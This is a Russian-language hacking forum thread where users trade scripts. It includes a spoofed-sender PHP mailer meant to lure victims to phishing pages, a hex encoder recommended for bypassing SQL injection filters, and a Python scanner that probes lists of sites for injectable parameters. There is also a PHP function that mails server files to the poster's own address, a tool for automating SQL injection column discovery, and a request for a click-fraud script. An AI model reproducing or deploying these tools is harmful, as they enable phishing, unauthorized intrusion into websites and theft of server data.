Анонимные письма ! Часто новички задаются вопросами вот как отослать анонимное мыло чтоб заманить жертву на фейк. вот простенький скрипт для отправки мыла на пхп коде: PHP: <HTML> <body bgcolor=fffafa> <h1 align="center"><font color=aaaaaa>This MailScript Produced by M()N$TeR</font></h1> <table align="center"> <form method="POST" action="sendmail.php"> <tr>От кого: <br> <input type="TEXT" name="frommail"> <br>Кому:<br> <input type="TEXT" name="tomailz"> <br>Тема: <br><input type="TEXT" name="mailtema"> <br>Текст: <br> <td><textarea name="mailtext" rows="10" cols="60"></textarea></td> </tr> <tr> <td align=center><input type="submit" value="Отправить" name="submit"></td> </tr> </form> <? if (isset($submit)){ mail($_POST['tomailz'],$_POST['mailtema'],$_POST['mailtext'],"From: $_POST['frommail'] "); echo "<h2>Сообщение отправлено!</h2>"; } ?> </body> </html> --------------------------------------------------------------------------------- незабудте назвать ваш скрипт sendmail.php
Text to HEX (ASCII to HEX) PHP Не знаю было тут или нет, поэтому заранее прошу прощения, если было. Скрипт для перекодировки текста в HEX в 2-х вариантах: 1. 0x 2. % PHP: <? $fout=fopen('url_in_HEX.txt','a+'); $source_column2 = fopen('source.txt','r'); $source_column1 = fgets($source_column2); fwrite ($fout,$source_column1 . "\r"); fclose($source_column2); function ascii2hex($ascii) { $hex = ''; for ($i = 0; $i < strlen($ascii); $i++) { $byte = strtoupper(dechex(ord($ascii{$i}))); $byte = str_repeat('0', 2 - strlen($byte)).$byte; $hex.=$byte." "; } return $hex; } $source_column2 = ascii2hex($source_column1); $patterns[0] = "/ /"; $replacements[0] = ""; $source_column3 = preg_replace($patterns, $replacements, $source_column2); $source_column3 = "0x$source_column3"; $patterns[0] = "/ /"; $replacements[0] = "%"; $source_column4 = preg_replace($patterns, $replacements, $source_column2); $source_column4 = "%$source_column4"; echo "\n"; echo $source_column3; echo "\n"; echo $source_column4; echo "\n"; fwrite ($fout,$source_column3 . "\r"); fwrite ($fout,$source_column4 . "\r"); fclose($fout); ?> где source.txt - файл с текстом, url_in_HEX.txt - результат. Очень удобно при SQL-inj, когда фильтруются кавычки и etc. В виде .exe (включая исходник) можно скачать здесь: http://pashkela.narod.ru/progi/Text2HEX.rar
ребята, измените за оффтоп! Вот вчера был на сайте и видел скрипт, который короче при заходе на сайт кого либо активируеться баннер ну типа зарабаток деньги за клик, только им кликать не надо а тупо на сайт заходить. надеюсь вы меня поняли :d я 3 раза 40 стр перелесттал найти не могу, поиск не помог
не понятно... пример кинь если можешь... или подробней расскажи!? ты зашел на сайт, а там реклама и что дальше?
Вот я зашел в эту тему! И был скрипт! "Вот вылаживаю скрипт, думаю пригоидться многим ко зарабатывает на кликах т.е. баннерах, когда кто-то входит на сайт он автоматически кликает на баннер т.е." Этот код внедрять в index.php надо! (млин сложно обьяснить я процитировал что человек говорил, он отписывался в этой теме).
Может кому-то будет нужен Скрипт на перле качает фотки с xuk.ru Code: #Скрипт закачивает фотки с xuk.ru ;) use LWP; use strict; my $n = shift; my $html = ''; if(defined($n)) { $html = "$n.html"; $n = " - $n"; } my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time); my $newdir = sprintf "%02u-%02u-%04u$n",$mday,$mon+1,$year+1900; mkdir $newdir || die 'cannot create directory'; chdir $newdir; my $ua = LWP::UserAgent->new; my $res = $ua->get("http://xuk.ru/$html"); die 'cannot connect' unless $res->is_success; my @main = split /\x0D\x0A/, $res->content; my @girl_url; foreach (@main) { if(/vid-1\.html/) { push @girl_url, $& if /http:\/\/xuk\.ru\/.*vid-1\.html/; } } foreach (@girl_url) { my $folder = substr $&, 1, -11 if /\/[\w-]*\/vid-1.html/; print "FOLDER: $folder\n"; mkdir $folder || die 'cannot create directory'; $res = $ua->get($_); unless($res->is_success) { warn "cannot connect\n"; next } my @vid = split /\x0D\x0A/, $res->content; my @foto_url; foreach(@vid) { if(/<img alt="Эротика/) { push @foto_url, $& if /http:\/\/pic\.xuk\.ru\/files.*\.jpg/; } } foreach (@foto_url) { my $filename = substr $&, 1 if /\/[\w-\(\)\.]*\.jpg/; print "\tFILE: $filename\n"; $ua->get($_, ':content_file' => "$folder/$filename"); } } chdir '..';
Может у кого есть скрипт,который будет заливать файл с компьютера на хост, чтобы после закачки выдавал ссылку на закачанный файл, только ссылку зашифрованную и чтобы можно было заливать файл в разные папки на хосте, ну просто выбираешь категорию файла, например музыка и закачиваешь и файл закачивается в site.ru/music/ или выбираешь категорию programm то закачивается в site.ru/programm/ Вообщем тут сделал не большую картинку для наглядного примера:
Обычный скрипт для загрузки изоражений напиши,а шифровку сделай через Base64,все будет намного проще!Тем более там всего лишь картинки,прятать нечего =)
загрузчик изображений... PHP: <? $dir1="./musik/"; $dir2="./film/"; $dir3="./123/"; ?> <FORM ENCTYPE='multipart/form-data' METHOD=POST> файл: <INPUT NAME='front' TYPE='file'> <select name="dir" size="1"> <option value="<? echo $dir1; ?>">Музыка </option> <option value="<? echo $dir2; ?>">Фильмы </option> <option value="<? echo $dir3; ?>">И т.д. </option> </select> <INPUT TYPE='submit'> </FORM> <?php $tmp_name="tmp.jpg"; if(isset($_FILES['front']['name'])) { $tmpName = $_FILES['front']['tmp_name']; $name = base64_encode($front); $n=str_replace("=","",$name); $newName = $dir.$n.".jpg"; if(!is_uploaded_file($tmpName) || !move_uploaded_file($tmpName, $newName)) { echo "error"; } } ?> будут вопросы пиши, прокоментирую, что к чему...
Code: #!/usr/bin/python from sgmllib import SGMLParser import sys, urllib, re, urllib2, sets class URLLister(SGMLParser): def reset(self): SGMLParser.reset(self) self.urls = [] def start_a(self, attrs): href = [v for k, v in attrs if k=='href'] if href: self.urls.extend(href) def test(host): source = urllib2.urlopen(host+sys.argv[2]).read() if re.search("Warning", source) != None: print "\n\t[!] SQL:",host+sys.argv[2] if re.search("mysql_fetch_array()", source) != None: print "\t[!] Found: mysql_fetch_array() error\n" if re.search("You have an error in your SQL syntax", source) != None: print "\t[!] Found: sql syntax error\n" print "\n\t SQLtest v1.2" print "\t--------------------------------------------\n" if len(sys.argv) != 3: print "Usage : ./sqltest.py <list of sites> <payload (-1, 999999)>" print "Eg: ./sqltest.py sites.txt \"-1\"\n" sys.exit(1) try: sites = open(sys.argv[1], "r").readlines() except(IOError): print "Error: Check your site list path\n" sys.exit(1) print "[+] Loaded:",len(sites),"sites" print "[+] Payload:",sys.argv[2] for site in sites: site = site.replace("\n","") if site.find("http://") != -1: site = site.replace("http://","") site = "http://"+site.rsplit("/",1)[0] if site.find("https://") != -1: site = site.replace("https://","") site = "https://"+site.rsplit("/",1)[0] print "\n[+] Collecting:",site try: usock = urllib.urlopen(site) parser = URLLister() parser.feed(usock.read()) parser.close() usock.close() if len(parser.urls) >=1: urls2 = [] for url in parser.urls: if url.find("://") == -1: if url[0] == "/": url = site+url else: url = site+"/"+url if url.count("=") >= 2: for x in xrange(url.count("=")): urls2.append(url.rsplit("=",x+1)[0]+"=") if url.find("=") != -1: if url[0] == "/": urls2.append(site+url.split("=",1)[0]+"=") else: urls2.append(url.split("=",1)[0]+"=") urls2 = list(sets.Set(urls2)) print "[+] Links Found:",len(urls2),"\n" else: urls2 = [] print "[-] Error Connecting" for url in urls2: print "[+] Testing:",url+sys.argv[2] try: test(url) except: pass except: pass print "\n[-] Done\n" попробуй
вот нашел у себя на винте, думаю кому нить полезно будет посмотреть... функция по отправке файла с сервера себе на мыло... PHP: function download_mail($dir,$file) { $demail="Ваше@мыло.ру"; $buf = explode(".", $file); $dir = str_replace("\\","/",$dir); $fullpath = $dir."/".$file; $size = tinhbyte(filesize($fullpath)); $fp = fopen($fullpath, "rb"); while(!feof($fp)) $attachment .= fread($fp, 4096); $attachment = base64_encode($attachment); $subject = "тема сообщения ($file)"; $boundary = uniqid("NextPart_"); $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\""; $info = "---==== Сообщение от ($demail)====---\n\n"; $info .= "IP:\t$REMOTE_ADDR\n"; $info .= "HOST:\t$HTTP_HOST\n"; $info .= "URL:\t$HTTP_REFERER\n"; $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--"; $send_to = "$demail"; $send = mail($send_to, $subject, $info, $headers); if($send == 2) echo "<br> <center> Спасибо!!!Файл <b>$file</b> отправлен вам на <u>$demail</u>.</center><br>"; fclose($fp); } использавать так: download_mail($dir,$file); где $dir это директория на серваке, а $file файл который вы хотите отправить...
MySQL_column Программа MySQL_column предназначена для автоматизации процесса узнавания кол-ва колонок при потенциальной sql-inj В комплекте 4 файла: 1. mysql_column.exe - сама программа 2. source_url.txt - файл инициализации URL, при котором можно получить SQL-inject (вам лишь следует скопировать нужный URL в этот файл и заменить вашу {sql} на "№"). Например здесь есть sql: http://www.sait.ru/index.php?id=5+union+select+1/*, значит в файл пишем: http://www.sait.ru/index.php?id=5№ 3. source_filtr.txt - файл инициализации фильтра (/*,-- или просто пусто). В данном случае "/*" 4. source_host.txt - файл инициализации взламываемого хоста. Если посмотреть выше - то www.sait.ru 5. После того, как вы занесли заполнили эти два файла (обязательное условие для корректной работы программы), можете запускать саму программу mysql_column.exe. Она автоматически выяснит и сохранит без вашего участия в файл output.txt следующие параметры: 1) Правильное кол-во колонок 2) Номер принтабельной колонки 3) Валидный урл для получения информации при sql-inj Example: http://www.site.org/index.php?id=5+union+select+1,2,3?????????????/* source_url.tx: "http://www.site.org/index.php?id=5№" source_host.txt: "www.site.org" source_filtr.txt: "/*" (c)Pashkela скачать здесь: http://pashkela.narod.ru/progi/MySQL_column.rar
кодировщик Кодировщик Code: <SCRIPT LANGUAGE="JavaScript"> <!-- // By PATRICK CLINGER ([email protected]) // Web Site: http://www.proboards.com/ // Script featured on Website Abstraction (http://wsabstract.com) // Over 400+ free scripts: Wsabstract.com<br> var letters = 'ЛМНОПрстуфхцчшщьыъэюяАБВГДЕЫЭЮЯкпghijklабвгдежзийКabvwxyzABCDEFef)_ЖЗИЙРСТУФХЦЧШЩЪЬ+|<>?:mnQRSTUЛМНОПрсту~!@лмно#$%^VWXYZ`1234567opGHIJKLu./;'+" "+';'+"'"+'[]MNOP890-='+'\\'+'&*("{},cdqrst'+"\n"; var split = letters.split(""); var num = ''; var c = ''; var encrypted = ''; function encrypt(it){var b = '0'; var chars = it.split(""); while(b<it.length) { c = '0'; while(c<letters.length){ if(split[c] == chars[b]){ if(c == "0") { c = ""; } if(eval(c+10) >= letters.length){ num = eval(10-(letters.length-c)); encrypted += split[num]; } else{ num = eval(c+10); encrypted += split[num]; } } c++; } b++; } document.forms[0].data.value = encrypted;encrypted = ''; } function decrypt(it){ var b = '0'; var chars = it.split(""); while(b<it.length){c = '0'; while(c<letters.length){ if(split[c] == chars[b]){ if(c == "0") { c = ""; } if(eval(c-10) < 0){ num = eval(letters.length-(10-c)); encrypted += split[num]; } else { num = eval(c-10); encrypted += split[num]; } } c++; } b++; } document.forms[0].data.value = encrypted; encrypted = ''; } // --> </SCRIPT>
WordPress footer.php decoder Декодирует footer.php в WordPress. This tool is for decode footer.php in WordPress http://pashkela.narod.ru/progi/WordPress_footer_decoder.rar
nikoTM,зачем так паниковать?Это обычный пример из книги JS, и в интеренете полного такого,просто чел перед тем как постить не будет же листать 46 страниц и смотреть,нету ли дабл мессагов
Скрипт Отправки E-mail по списку Скрипт Отправки E-mail по списку Скрипт надо вставить между <BODY> и </BODY> HTML: <FORM NAME="mailer" METHOD="post" ACTION="" ENCTYPE="text/plain" onSubmit="(document.mailer.action += mailtoandsubject)"> <!-- Original: Jeff Kieke --> <!-- This script and many more are available free online at --> <!-- The JavaScript Source!! http://javascript.internet.com --> <TABLE BORDER=0 bgcolor="#CCCCCC"> <TR VALIGN="top"> <TD>Получатель:</TD> <TD><SELECT NAME="mailtoperson" onChange="msg(this.form)"> <OPTION VALUE="">-- Выбрать -- <OPTION VALUE="[email protected]">[email protected] <OPTION VALUE="[email protected]">[email protected] <OPTION VALUE="[email protected]">[email protected] </SELECT></TD> </TR> <TR VALIGN="top"> <TD>Ваше имя:</TD> <TD><INPUT TYPE="text" SIZE=35 NAME="name" onChange="msg(this.form)"></TD> </TR> <TR VALIGN="top"> <TD>Ваш Email:</TD> <TD><INPUT TYPE="text" SIZE=35 NAME="email" onChange="msg(this.form)"></TD> </TR> <TR VALIGN="top"> <TD>Важность:</TD> <TD> <SELECT NAME="priority" onChange="msg(this.form)"> <OPTION VALUE="NaN" selected>Невыбрано <OPTION VALUE="Normal">Обыное <OPTION VALUE="Urgent">Важное <OPTION VALUE="No Reply Needed">Не очень важное </SELECT></TD> </TR> <TR VALIGN="top"> <TD>Тема:</TD> <TD><INPUT TYPE="text" SIZE=35 NAME="subject" onChange="msg(this.form)"></TD> </TR> <TR VALIGN="top"> <TD>Сообщение:</TD> <TD><TEXTAREA NAME="message" COLS=35 ROWS=5 WRAP="virtual" OnChange="msg(this.form)"></TEXTAREA></TD> </TR> <TR> <TD> </TD> <TD><INPUT TYPE="submit" VALUE="Отправить"> <INPUT TYPE="reset" VALUE="Сброс"></TD> </TR> </TABLE> </FORM> <SCRIPT LANGUAGE="JavaScript"> function msg() { document.mailer.action = "mailto:" mailtoandsubject = ((document.mailer.mailtoperson.options[document.mailer.mailtoperson.selectedIndex].value) + '?subject=' + document.mailer.subject.value); } </SCRIPT>